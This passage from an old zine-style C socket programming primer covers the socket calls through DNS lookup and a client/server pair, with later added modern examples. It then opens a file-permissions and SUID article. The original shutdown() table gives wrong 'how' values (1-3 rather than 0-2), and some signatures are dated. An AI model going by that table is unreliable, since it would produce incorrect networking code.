       #include <unistd.h>
       #include <strings.h>
       #include <sys/types.h>
       #include <sys/socket.h>
       #include <netinet/in.h>
      
      int sockfd, port = 23;
      struct sockaddr_in my_addr;
      
         if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == -1)
         {
            printf("Socket Error, %d\n", errno);
            exit(1);
         }
        
         my_addr.sin_family = AF_INET; /* host byte order */
         my_addr.sin_port = htons(port); /* see man htons for more information */
         my_addr.sin_addr.s_addr = htonl(INADDR_ANY); /* get our address */
         bzero(&(my_addr.sin_zero), 8); /* zero out the rest of the space */
      
         if((bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1)
         {
            printf("Bind Error, %d\n", errno);
            close(sockfd);
            exit(1);
         }
      
      ------
       There you go, if all went well, our socket now has a name, and if all
       didn't go well, the error was reported and the program exited.
       A few small notes - if all your program does is connect to other computers,
       you don't need to use the bind() function at all (although it won't hurt
       anything). The line:  my_addr.sin_port = htons(port); can be automated to
       get its own port by just setting the port to 0, good for client programs,
       bad for server programs as you don't know what port it's using.
      
      Now we have a socket, it's named, but it still doesn't do anything, that's
      not good...lets see if we can connect to another computer.
      
      =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
      Remote connections using: connect()
      
      If you want to connect to a remote machine, there's no getting around
      using the connect() function:
      ------
      
       #include <sys/types.h>
       #include <sys/socket.h>
      
      int connect(int sockfd, struct sockaddr *serv_addr, int addrlen); 
      
      ------
       sockfd is our friendly socket file descriptor returned from our call to socket().
       serv_addr is a struct sockaddr containing the destination port and IP address.
       addrlen can be set to sizeof(struct sockaddr).
       Let's have another example:
      ------
      
       #include <sys/types.h>
       #include <sys/socket.h>
       #include <netinet/in.h>
       #include <arpa/inet.h>
       #include <strings.h>

       #define DEST_IP   "132.241.5.10"
       #define DEST_PORT 23

       int main(void)
      {
      int sockfd;
      struct sockaddr_in dest_addr;   /* will hold the destination addr */
      
         sockfd = socket(AF_INET, SOCK_STREAM, 0); /* do some error checking! */
      
         dest_addr.sin_family = AF_INET;        /* host byte order */
         dest_addr.sin_port = htons(DEST_PORT); /* short, network byte order */
         dest_addr.sin_addr.s_addr = inet_addr(DEST_IP);
         bzero(&(dest_addr.sin_zero), 8);       /* zero the rest of the struct */
      
         connect(sockfd, (struct sockaddr *)&dest_addr, sizeof(struct sockaddr));
         /* error checking code here */
        /* more code 
      .
      .
      .
       */
      }
      
      ------
       Again, connect() returns 0 on success, -1 on error and sets errno.
       You may have noticed the lack of a call to bind() because we don't care what
       port we connect from; in a case like this the only port that matters is the
       one we're connecting to.
      
      =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
      Listening for calls using: listen()
      
      Let's say we want to make a server program of some sort, we need some way
      to listen for incoming connections don't we, lets see if the listen()
      function works (it just might ya know ;))
      ------
      
       #include <sys/types.h>
       #include <sys/socket.h>
      
      int listen(int sockfd, int backlog);
      
      ------
       sockfd again is our socket file descriptor.
       backlog is how many connections we'll take at once.
      
      Again, as usual, listen() returns -1 and sets errno on error. 
      Now in this case we will need to call bind() before we call listen() (we
      want a regular port for people to connect to instead of making them guess)
      Our function order so far would be:
      
      ------
      
       socket(); /* to create our socket file descriptor */
      bind(); /* to give our socket a name */
      listen(); /* listen for connection */
      
      ------
      
      =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
      Taking the connection using: accept()
      
      Ok, this is where the...uhm...fun begins. Someone tries to connect to a
      port you happen to be listening on, you need to accept that connection
      now and accept() will do just that (who knew? ;))
      ------
      
       #include <sys/types.h>
       #include <sys/socket.h>
      
      int accept(int sockfd, void *addr, int *addrlen);
      
      ------
       Again, sockfd is our friendly socket file descriptor.
       addr is usually going to be a pointer to a struct, struct sockaddr_in.
       addrlen will be set to: sizeof(struct sockaddr_in).
      Can you guess what gets returned on error?...you got it...-1 and errno
      gets set. E.G:
      ------
      
       #include <sys/types.h>
       #include <sys/socket.h>
       #include <netinet/in.h>
       #include <strings.h>

       #define MYPORT 1500    /* the port users will be connecting to */
       #define BACKLOG 5      /* how many pending connections queue will hold */

       int main(void)
       {
       int sockfd, new_fd;  /* listen on sock_fd, new connection on new_fd */
       struct sockaddr_in my_addr;    /* my address information */
       struct sockaddr_in their_addr; /* connector's address information */
       socklen_t sin_size;

          sockfd = socket(AF_INET, SOCK_STREAM, 0); /* do some error checking! */

          my_addr.sin_family = AF_INET;         /* host byte order */
          my_addr.sin_port = htons(MYPORT);     /* short, network byte order */
          my_addr.sin_addr.s_addr = INADDR_ANY; /* auto-fill with my IP */
          bzero(&(my_addr.sin_zero), 8);        /* zero the rest of the struct */

          /* did you remember your error checking? */
          bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr));

          listen(sockfd, BACKLOG);

          sin_size = sizeof(struct sockaddr_in);
          new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size);
          /* talk to new_fd here */
          return 0;
       }
      
      ------
      Note that we will use the socket descriptor new_fd for all send() and
      recv() calls. If you're only getting one single connection, you can
      close() the original sockfd in order to prevent more incoming connections 
      on the same port, if you so desire. 
      
      =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
      I think we need to talk: send() and recv()
      
      Now, we've created a socket, given it a name, listened for and accepted a
      connection, it's finally time to exchange information with send() and
      recv():
      ------
      
      #include 
      #include 
      
      int send(int sockfd, const void *msg, int len, int flags);
      int recv(int sockfd, void *buf, int len, unsigned int flags);
      
      ------
      send():
      sockfd - socket file descriptor
      msg - message to send
      len - size of message to send
      flags - read 'man send' for more info, set it to 0 for now :)
      
      recv():
      sockfd - socket file descriptor
      buf - data to receive
      len - size of buf
      flags - same as flags in send()
      
      send() example:
      ------
      
       char *msg = "Hey there people";
       int len, bytes_sent;

       /* code to socket(), bind(), listen() and accept() */

       len = strlen(msg);
       bytes_sent = send(sockfd, msg, len, 0);
       /* send() may send fewer than len bytes; check bytes_sent */

       ------
       recv() example:
       ------

       char buf[1024];
       int len, recv_msg;

       /* code to socket(), bind(), listen() and accept() */

       len = sizeof(buf) - 1;                    /* leave room for a terminating NUL */
       recv_msg = recv(sockfd, buf, len, 0);
       if (recv_msg > 0) buf[recv_msg] = '\0';  /* recv() does not NUL-terminate */
      
      ------
       And again, both send() and recv() return -1 on error and set errno.
       If you're using type SOCK_DGRAM you use the sendto() and recvfrom()
       functions for sending and receiving data.
      
      =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
      Nice talking to you: close() and shutdown()
      
      Once you're finished exchanging data, it's time to close the connection by
      simply closing the socket:
      ------
      
       #include <unistd.h>

       /* all your code */
      
      close(sockfd);
      
      ------
      Pretty easy eh?  If you want a bit more control over how the connection
      gets closed you can use the shutdown() function:
      ------
      
       #include <sys/socket.h>

       int shutdown(int sockfd, int how);
      
      ------
      There are three different values for how:
          1 - no more recv()'s allowed
          2 - no more send()'s allowed
          3 - no more send()'s or recv()'s allowed (same as close())
      
      It's easy as that. You have now created a socket, given it a name, listened
      for connections, accepted connections, connected to other computers and
      closed the socket, not bad for a days work eh?
      
      =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
       Who are you: getpeername()
      
      So you want to know who it is that's connecting to you? Well you're in luck!
      There just so happens to be a function for just that purpose:
      ------
      
       #include <sys/socket.h>
      
      int getpeername(int sockfd, struct sockaddr *addr, int *addrlen);
      
      ------
       sockfd - our friendly socket file descriptor rears its ugly head again
       addr - a pointer to either 'struct sockaddr' or 'struct sockaddr_in'
       addrlen - should be set to: sizeof(struct sockaddr)

       My oh my, getpeername() also returns -1 on error, who would have guessed?
       If this call worked right, you now have the person's address and can use
       inet_ntoa() or gethostbyaddr() to print more info, not their login name
       though, unless they're running identd, but that's beyond what we're talking
       about here. Read RFC 1413 for more information on that.
      
      =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
      Who am I: gethostname()
      
       Ok, getpeername() was easy, well, gethostname() is easier.
      ------
      
       #include <unistd.h>
      
      int gethostname(char *hostname, size_t size);
      
      ------
      hostname - an array of type char that will hold the host name on return
      size - size of the above mentioned array
      
      This returns the name of the computer your program is running on and can
      then be used with gethostbyname() to print out your IP address. Again, -1
      on error and sets errno.
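       The whole call sequence from the sections above, run end to end on the
       loopback interface inside one process, as an added example that is not
       from xphantom's paper: socket(), bind() to port 0 (the "let the system
       pick a port" trick), getsockname() to learn which port that was, listen(),
       connect() from a second socket, accept(), send() and recv() with the
       partial-transfer and missing-NUL cases handled, getpeername() on the
       accepted socket, then shutdown() and close(). The function name
       run_loopback_exchange, the greeting text and the use of 127.0.0.1 are my
       choices; the shutdown() call uses the SHUT_RD/SHUT_WR/SHUT_RDWR constants
       from <sys/socket.h> (0, 1 and 2) rather than literal numbers.

```c
#define _DEFAULT_SOURCE 1     /* glibc: keep POSIX/BSD declarations visible under -std=c99 */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define GREETING "Hey there people"   /* constructed payload, same text as the send() example */

/* Walks socket() -> bind() -> listen() on the server side, connect() on the
 * client side, then accept(), send()/recv(), getpeername(), shutdown() and
 * close(). Returns 0 when the client received exactly GREETING; a negative
 * value identifies the step that failed. */
int run_loopback_exchange(void)
{
    int listener = -1, client = -1, conn = -1, rc = -1;
    struct sockaddr_in my_addr, dest_addr, their_addr;
    socklen_t len;
    char buf[64];
    ssize_t n, got = 0;

    if ((listener = socket(AF_INET, SOCK_STREAM, 0)) == -1) return -1;
    if ((client = socket(AF_INET, SOCK_STREAM, 0)) == -1) { rc = -2; goto out; }

    /* bind() to port 0: the kernel picks a free port. memset() zeroes the whole
     * struct, which also covers the bzero(sin_zero) step from the tutorial. */
    memset(&my_addr, 0, sizeof my_addr);
    my_addr.sin_family = AF_INET;
    my_addr.sin_port = htons(0);
    my_addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    if (bind(listener, (struct sockaddr *)&my_addr, sizeof my_addr) == -1) { rc = -3; goto out; }

    /* getsockname() recovers the port the kernel chose, which is the "bad for
     * server programs" problem the bind() section mentions */
    len = sizeof my_addr;
    if (getsockname(listener, (struct sockaddr *)&my_addr, &len) == -1) { rc = -4; goto out; }
    if (listen(listener, 5) == -1) { rc = -5; goto out; }

    /* client side: connect() completes against the listen backlog before accept() runs */
    memset(&dest_addr, 0, sizeof dest_addr);
    dest_addr.sin_family = AF_INET;
    dest_addr.sin_port = my_addr.sin_port;       /* already in network byte order */
    dest_addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    if (connect(client, (struct sockaddr *)&dest_addr, sizeof dest_addr) == -1) { rc = -6; goto out; }

    len = sizeof their_addr;
    if ((conn = accept(listener, (struct sockaddr *)&their_addr, &len)) == -1) { rc = -7; goto out; }

    /* getpeername() on the accepted socket must report the loopback client */
    len = sizeof their_addr;
    if (getpeername(conn, (struct sockaddr *)&their_addr, &len) == -1 ||
        their_addr.sin_addr.s_addr != htonl(INADDR_LOOPBACK)) { rc = -8; goto out; }

    /* send() may write fewer bytes than asked for: loop until everything is out */
    for (n = 0; n < (ssize_t)strlen(GREETING); n += got) {
        got = send(conn, GREETING + n, strlen(GREETING) - (size_t)n, 0);
        if (got <= 0) { rc = -9; goto out; }
    }
    /* half-close the server side (SHUT_RD=0, SHUT_WR=1, SHUT_RDWR=2): the client
     * sees end-of-file once it has drained the data */
    if (shutdown(conn, SHUT_WR) == -1) { rc = -10; goto out; }

    /* recv() neither NUL-terminates nor promises the whole message in one call:
     * read until EOF, always keeping one byte free for the terminator */
    for (n = 0; n < (ssize_t)sizeof buf - 1; n += got) {
        got = recv(client, buf + n, sizeof buf - 1 - (size_t)n, 0);
        if (got < 0) { rc = -11; goto out; }
        if (got == 0) break;
    }
    buf[n] = '\0';
    rc = (strcmp(buf, GREETING) == 0) ? 0 : -12;

out:
    if (conn != -1) close(conn);
    if (client != -1) close(client);
    if (listener != -1) close(listener);
    return rc;
}

int main(void)
{
    int rc = run_loopback_exchange();
    printf("loopback exchange: %s (%d)\n", rc == 0 ? "ok" : "failed", rc);
    return rc == 0 ? 0 : 1;
}
```

       Both ends live in one process only so the exchange can be checked without
       a second terminal; the calls and their order are exactly what a separate
       client and server would make. The send() and recv() loops are the part
       the tutorial's one-line examples leave out: a short write or a short read
       is normal on a stream socket, and the terminator has to be added by the
       reader.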
      
      =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
      What's your IP? 
      
       Well, let's put that information to use, ok? We'll make our first, full
       fledged program, a DNS program. DNS or "Domain Name Service" is a way of
       getting a machine's IP address by using its "human-readable" address.
       Have you ever telneted to a machine and seen:
      
      $ telnet microsoft.com
        Trying 206.163.24.176 (not the real address but I'm too lazy to try :))
      
       Well guess what, the first thing the telnet program did was do a DNS check
       on microsoft.com so it could find the IP. Now, to do this we'll be using
       the function gethostbyname() which can be found in netdb.h
      ------
      
       #include <netdb.h>
          
      struct hostent *gethostbyname(const char *name);
      
      ------
      By looking at that you see it uses a structure called 'struct hostent'
      which looks like:
      ------
      
      struct hostent {
              char    *h_name;
              char    **h_aliases;
              int     h_addrtype;
              int     h_length;
              char    **h_addr_list;
          };
      #define h_addr h_addr_list[0]
      
      ------
      This structure breaks down to:
      
      h_name - Official name of host
      h_aliases - A NULL-terminated array of alternate names for the host. 
      h_addrtype - The type of address being returned; usually AF_INET. 
      h_length - The length of the address in bytes.
      h_addr_list - A zero-terminated array of network addresses for the host.
                    Host addresses are in Network Byte Order. 
      h_addr - The first address in h_addr_list
      
       gethostbyname() returns a pointer to the filled struct hostent, or NULL on
       error. (But errno is not set--h_errno is set instead. See 'man herror' for
       more help.) Now let's make our DNS program:
      ------
      
      #include <stdio.h>
      #include <stdlib.h>
      #include <netdb.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <arpa/inet.h>
      
      int main(int argc, char *argv[])
      {
         struct hostent *h;
      
         if (argc != 2) {  /* error checking on the command line */
            fprintf(stderr,"Usage: getip hostname\n");
            exit(1);
         }
      
         if ((h=gethostbyname(argv[1])) == NULL) {  /* get the host info */
            herror("gethostbyname");   /* prints the h_errno message, not errno */
            exit(1);
         }
      
         printf("Host name  : %s\n", h->h_name);
         /* h_addr is h_addr_list[0]; inet_ntoa() turns the binary address into text */
         printf("IP Address : %s\n",inet_ntoa(*((struct in_addr *)h->h_addr)));
      
         return 0;
      }
      
      ------
      And there you go, small and easy, just the way we like it, compile it
      with: gcc -o getip getip.c (assuming you saved it as getip.c :))
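      Here is the same lookup done with getaddrinfo(), the interface that replaced
      gethostbyname(). This is an added example for this edition, not xphantom's
      code; the helper name resolve_host() and the numeric_only switch are my own
      choices. It handles IPv4 and IPv6, frees its own result instead of sharing a
      static buffer, and can be told to accept only address literals, which is the
      right setting when the "hostname" comes from an untrusted source and you do
      not want to trigger a DNS query at all.

```c
/* getaddrinfo() lookup: added example, not part of the original getip.c.
 * Assumed helper name: resolve_host(). Compile: gcc -o resolve resolve.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Resolve `host` and write its first address (IPv4 or IPv6) as text into
 * out[outlen]. With numeric_only set, no DNS query is sent: the string must
 * already be an address literal (handy for offline tests and for refusing
 * to resolve attacker-supplied names). Returns 0 on success, -1 on failure. */
int resolve_host(const char *host, int numeric_only, char *out, size_t outlen)
{
    struct addrinfo hints, *res, *p;
    int rc, found = -1;

    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_UNSPEC;        /* accept both IPv4 and IPv6 */
    hints.ai_socktype = SOCK_STREAM;    /* one entry per address, not per protocol */
    if (numeric_only)
        hints.ai_flags = AI_NUMERICHOST;

    rc = getaddrinfo(host, NULL, &hints, &res);
    if (rc != 0) {
        /* getaddrinfo has its own error strings, like herror() for gethostbyname */
        fprintf(stderr, "getaddrinfo(%s): %s\n", host, gai_strerror(rc));
        return -1;
    }

    for (p = res; p != NULL; p = p->ai_next) {
        void *addr;
        if (p->ai_family == AF_INET)
            addr = &((struct sockaddr_in *)p->ai_addr)->sin_addr;
        else if (p->ai_family == AF_INET6)
            addr = &((struct sockaddr_in6 *)p->ai_addr)->sin6_addr;
        else
            continue;
        /* inet_ntop() is the address-family-aware replacement for inet_ntoa() */
        if (inet_ntop(p->ai_family, addr, out, outlen) != NULL) {
            found = 0;
            break;
        }
    }
    freeaddrinfo(res);   /* the list is heap-allocated, unlike hostent's static buffer */
    return found;
}

int main(int argc, char *argv[])
{
    char text[INET6_ADDRSTRLEN];

    if (argc != 2) {
        fprintf(stderr, "Usage: resolve hostname\n");
        return 1;
    }
    if (resolve_host(argv[1], 0, text, sizeof text) < 0)
        return 1;
    printf("%s -> %s\n", argv[1], text);
    return 0;
}
```

      Compile with gcc -o resolve resolve.c and run ./resolve www.example.com;
      with numeric_only set to 1 the same function refuses anything that is not
      already an IP literal, so "::1" and "127.0.0.1" work offline and a name
      never reaches the resolver.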
      
      =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
      Client and Server programs
      
      Ok, lets end this discussion with a small, and somewhat pointless,
      client-server application. The only purpose of this is for a user to
      connect to the server, receive a predefined string, then disconnect, but
      it should get the point across. I'll leave making it more useful as a job
      for you to do...oh, you can do the error checking in it too :)
      ------
      
      <++> socket/server.c
      /* SERVER PROGRAM */
      #include <stdio.h>
      #include <stdlib.h>
      #include <string.h>
      #include <unistd.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <sys/wait.h>
      #include <netinet/in.h>
      #include <arpa/inet.h>
      
      #define PORT 1500      /* the port users will be connecting to */
      
      #define BACKLOG 5      /* how many pending connections queue will hold */
      
      int main(void)
      {
      int sockfd, new_fd;  /* listen on sock_fd, new connection on new_fd */
      struct sockaddr_in my_addr;    /* our address information */
      struct sockaddr_in their_addr; /* their address information */
      socklen_t sin_size;            /* accept() wants a socklen_t, not an int */
      int yes = 1;
      
         sockfd = socket(AF_INET, SOCK_STREAM, 0);
         /* remember to error check (-1 on error) */
      
         /* lets you restart the server right away instead of waiting for
            the old connections' TIME_WAIT to expire on the port */
         setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes));
      
         memset(&my_addr, 0, sizeof(my_addr)); /* zero the whole struct, sin_zero included */
         my_addr.sin_family = AF_INET;         /* host byte order */
         my_addr.sin_port = htons(PORT);       /* short, network byte order */
         my_addr.sin_addr.s_addr = INADDR_ANY; /* listen on every interface; use
                                                  inet_addr("127.0.0.1") to stay local */
      
         bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr));
      
         listen(sockfd, BACKLOG);
      
         while(1) {  /* start out accept() loop */
            sin_size = sizeof(struct sockaddr_in);
            new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size);
            printf("server: got connection from %s\n", inet_ntoa(their_addr.sin_addr));
            if (fork() == 0) {  /* fork() returns 0 only in the child process */
               close(sockfd);   /* the child doesn't need the listening socket */
               send(new_fd, "Hello, world!\n", 14, 0);
               close(new_fd);
               exit(0);
            }
            close(new_fd);      /* the parent is done with this connection */
      
            while(waitpid(-1,NULL,WNOHANG) > 0); /* clean up child processes */
         }
      }
      
      /* END SERVER PROGRAM, REMEMBER TO DO YOUR ERROR CHECKING */
      <-->
      <++> socket/client.c
      /* CLIENT PROGRAM */
      
      #include <stdio.h>
      #include <stdlib.h>
      #include <string.h>
      #include <unistd.h>
      #include <netdb.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      
      #define PORT 1500    /* the port client will be connecting to */
      
      #define MAXDATASIZE 100 /* max number of bytes we can get at once */
      
      int main(int argc, char *argv[])
      {
      int sockfd, numbytes;  
      char buf[MAXDATASIZE];
      struct hostent *he;
      struct sockaddr_in their_addr; /* connector's address information */
      
         if (argc != 2) {
            fprintf(stderr,"Usage: client hostname\n");
            exit(1);
         }
      
         he = gethostbyname(argv[1]);  /* get the host info */
         /* did you check for errors? (he is NULL on failure and must not be used) */
      
         sockfd = socket(AF_INET, SOCK_STREAM, 0);
      
         memset(&their_addr, 0, sizeof(their_addr)); /* zero the whole struct */
         their_addr.sin_family = AF_INET;      /* host byte order */
         their_addr.sin_port = htons(PORT);    /* short, network byte order */
         their_addr.sin_addr = *((struct in_addr *)he->h_addr);
      
         connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr));
      
         /* ask for one byte less than the buffer holds: the terminating '\0'
            below needs that slot, otherwise a full read writes past the buffer */
         numbytes = recv(sockfd, buf, MAXDATASIZE-1, 0);
         if (numbytes < 0) {   /* -1 on error; buf[-1] would be out of bounds */
            perror("recv");
            exit(1);
         }
      
         buf[numbytes] = '\0';
      
         printf("Received: %s",buf);
      
         close(sockfd);
      
         return 0;
      }
      
      /* END CLIENT...YOU CHECKED FOR ERRORS RIGHT? :) */
      <-->
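      One thing the client above glosses over is that a TCP stream has no message
      boundaries: the "Hello, world!\n" may arrive in one recv() or in three, and
      whatever you read must be bounded by your buffer, not by the sender. The
      following is an added example (my code, not part of xphantom's client.c)
      of a line receiver that keeps reading until a newline or the buffer is
      full, always NUL-terminates, and reports an over-long line instead of
      silently truncating it. The function name recv_line() and the demo() that
      fakes the connection with socketpair() so it runs offline are assumptions
      of mine.

```c
/* Bounded, partial-read-aware line receiver: added example, not code from the
 * original client.c. recv_line() and the socketpair() self-test are assumed
 * names for this demo. Compile: gcc -o recvline recvline.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>

/* Read from sock until a '\n' arrives or buflen-1 bytes are stored, whatever
 * the peer's packetisation. Always NUL-terminates. Returns the number of
 * bytes stored, 0 if the peer closed before sending anything, or -1 on
 * error (errno set; EMSGSIZE when the line did not fit). */
ssize_t recv_line(int sock, char *buf, size_t buflen)
{
    size_t used = 0;

    if (buflen == 0) {
        errno = EINVAL;
        return -1;
    }

    while (used < buflen - 1) {          /* always keep one slot for the '\0' */
        ssize_t n = recv(sock, buf + used, 1, 0); /* one byte: never read past the newline */
        if (n < 0) {
            if (errno == EINTR)           /* interrupted by a signal: just retry */
                continue;
            buf[used] = '\0';
            return -1;
        }
        if (n == 0)                       /* orderly shutdown by the peer */
            break;
        used += (size_t)n;
        if (buf[used - 1] == '\n')
            break;
    }
    buf[used] = '\0';
    if (used == buflen - 1 && buf[used - 1] != '\n') {
        errno = EMSGSIZE;                 /* line longer than the buffer: caller decides */
        return -1;
    }
    return (ssize_t)used;
}

/* Offline demo: a socketpair() stands in for the client/server connection.
 * The sender writes one line in two pieces, then a line that is too long. */
int demo(void)
{
    int sv[2];
    char buf[16];
    ssize_t n;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0)
        return -1;

    send(sv[0], "Hello, ", 7, 0);         /* first fragment ...            */
    send(sv[0], "world!\n", 7, 0);        /* ... second fragment, same line */
    n = recv_line(sv[1], buf, sizeof buf);
    printf("got %zd bytes: %s", n, buf);

    send(sv[0], "this line is far too long\n", 26, 0);
    n = recv_line(sv[1], buf, sizeof buf);
    printf("got %zd (%s): '%s'\n", n, n < 0 ? strerror(errno) : "ok", buf);

    close(sv[0]);
    close(sv[1]);
    return 0;
}

int main(void)
{
    return demo() < 0 ? 1 : 0;
}
```

      Reading a byte at a time is slow but it is the simplest way to stop
      exactly at the newline without swallowing the start of the next message;
      a real server would read bigger chunks into a per-connection buffer and
      carve lines out of that. Either way the invariant is the same as in the
      client fix above: the buffer, not the peer, decides how much is written.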
      
      =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
      
      Well, I think that's about it for now. This is by no means the complete
      guide to socket programming, actually, it's very far from being that and
      was never intended to be that so no problem. For further reading on this
      topic I would suggest checking out the following man pages:
      
      socket, bind, connect, perror, herror, listen, accept, send, recv,  close,
      shutdown, getpeername, getsockname, gethostbyname, gethostbyaddr and
      getprotobyname.
      
      You may also find the following book to be good reading:
      ------
      
      Internetworking with TCP/IP, volumes I-III by Douglas E. Comer and David
      L. Stevens. Published by Prentice Hall. Second edition ISBNs: 0-13-468505-9,  
      0-13-472242-6, 0-13-474222-2. There is a third edition of this set which
      covers IPv6 and IP over ATM.  
      
      Using C on the UNIX System by David A. Curry. Published by O'Reilly &
      Associates, Inc. ISBN 0-937175-23-4.
      
      TCP/IP Network Administration by Craig Hunt. Published by O'Reilly &
      Associates, Inc. ISBN 0-937175-82-X. 
      
      TCP/IP Illustrated, volumes 1-3 by W. Richard Stevens and Gary R. Wright.
      Published by Addison Wesley. ISBNs: 0-201-63346-9, 0-201-63354-X, 
      0-201-63495-3. 
      
      UNIX Network Programming by W. Richard Stevens. Published by Prentice
      Hall. ISBN 0-13-949876-1. 
      
      -------
      Wanna get the absolute lowdown on things? Check out these RFC's:
      ------
      
      RFC-768 -- The User Datagram Protocol (UDP)
      (ftp://nic.ddn.mil/rfc/rfc768.txt)
      
      RFC-791 -- The Internet Protocol (IP)
      (ftp://nic.ddn.mil/rfc/rfc791.txt)
      
      RFC-793 -- The Transmission Control Protocol (TCP)
      (ftp://nic.ddn.mil/rfc/rfc793.txt)
      
      RFC-854 -- The Telnet Protocol
      (ftp://nic.ddn.mil/rfc/rfc854.txt)
      
      RFC-951 -- The Bootstrap Protocol (BOOTP)
      (ftp://nic.ddn.mil/rfc/rfc951.txt)
      
      RFC-1350 -- The Trivial File Transfer Protocol (TFTP)
      (ftp://nic.ddn.mil/rfc/rfc1350.txt)
      
      ------
      Well, this is it I guess, time to bid you a farewell and a happy journey
      into sockets programming. As I said before, this is *NOT* a complete
      manual, it is merely a small primer. There maybe huge errors in here that
      I've totally missed, oh well, such is life, I never claimed to be an
      expert ;) Maybe soon I'll get around to doing a paper on type SOCK_DGRAM
      and other such socket oddities. 'Till then, have fun.
      
      ~xphantom
      =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
         
      
      -------[ File permissions
                by Lamagra 
                http://bounce.to/unah16
      
      -----------[ Introduction
      
      Although permissions determine who can read, write or execute a file, the
      same mode field also records the file type and how the file is executed
      (the set-user-ID and set-group-ID bits).
      
      You can display the permissions of a file with the command 'ls -l'.
      An example listing might look like this:
      
      drwx------ 2 tom users    512  Jan  3 13:44 Mail 
      drwx------ 5 tom users   1024  Jan 17 08:22 nsmail
      drwx------ 2 root root    512  Dec 28 22:44 bin
      -rw-r--r-- 1 tom users  23801  Jan  4 15:05 picture.gif
      -rw------- 1 tom users    787  Jan 12 06:35 prog.c
      -rwx--x--x 1 tom users  44692  Jan 12 06:41 prog
           1     2  3    4      5         6         7
      
      The first column shows us the file permissions, the second column tells us the 
      number of hard links to the file, and the third column shows who owns the file. 
      The fourth column shows to what group the file belongs, the fifth column tells 
      the number of bytes used by the file. The sixth column holds the date and time 
      of the last modification (not creation; traditional Unix file systems keep no 
      creation time), and the seventh shows the name.
      
      -----------[ Permissions
      
      The file permission field is divided into four sub-fields:
      
      - rwx rwx rwx
      
      The first sub-field defines the file type. 
      The different types are:
      
              -       normal file
              b       block device
              c       character device
              d       directory
              l       symbolic link
      
      The next three sub-fields define the actual file permissions.
      The first three characters are the user permissions, the next three the group permissions and the 
      last three are the permissions for everyone else. 
      The characters have the following meanings:
              
              r       read permission
              w       write permission
              x       permission to execute
              s       set-user-ID bit (in the user field) or set-group-ID bit (in
                      the group field), shown in place of the x
              t       sticky bit, shown in place of the x for everyone else
      
      Historically the sticky bit told the system to keep a copy of a program's
      text in swap after the program completes, so the next execution could start
      a little faster because it didn't have to be reloaded. Modern systems ignore
      it on regular files; what matters today is its meaning on directories: in a
      sticky directory such as /tmp (drwxrwxrwt) a file can only be deleted or
      renamed by its owner, the directory's owner, or root, even though everyone
      may create files there.
      
      Permissions can be changed with the 'chmod' command in a absolute or relative manner. 
      The absolute manner uses octal permissions, the following table shows a list of 
      valid octal permissions.
      
              0001    execute permission for everyone
              0002    write permission for everyone
              0004    read permission for everyone
              0010    execute permission for the group
              0020    write permission for the group
              0040    read permission for the group
              0100    execute permission for owner
              0200    write permission for owner
              0400    read permission for owner
              1000    sticky bit
              2000    group ID bit if the file is executable, otherwise mandatory file locking
              4000    user ID bit if the file is executable
      
      You give a file read, write permission for the owner and read permission for group and everyone 
      else in the following manner:
      
              0200    write permission for owner
              0400    read permission for owner
              0040    read permission for group
              0004    read permission for everyone
              ______________________________________
              0644    read and write for owner + read for everyone.
      
              chmod 644 file
      
      Relative permissions are slightly different. You have to state the following:
      
              * whom you're giving permissions to
              * what operation you intend to perform
              * what the permissions are
      
      whom:
              a       all users
              g       group
              o       others
              u       user
      
      operator:
              +       add 
              -       remove
              =       set
      
      permissions:
              the characters above
      
      
      example:
              read and write for owner + read for everyone
      
              chmod u=rw,g=r,o=r file
      
      
      -----------[ SUID and SGID
      
      SUID is short for Set User ID, and SGID is short for Set Group ID.
      When you run an executable file with these permissions, its effective UID 
      (User ID) is set the same as the user that owns the file. 
      SGID is similar except it changes the effective GID (Group ID) instead.
      
      Although this feature is very useful, it can present a huge security hole:
      every bug in a set-UID root program (a buffer overflow, an unchecked file
      name, an environment variable it trusts) is a bug that runs with root's
      privileges. SUID programs are generally used when the program needs special 
      permissions, such as root permission, to run; passwd is the classic case,
      since it has to write to a file normal users may not touch. A check every
      admin should know is listing all set-UID and set-GID files on the system
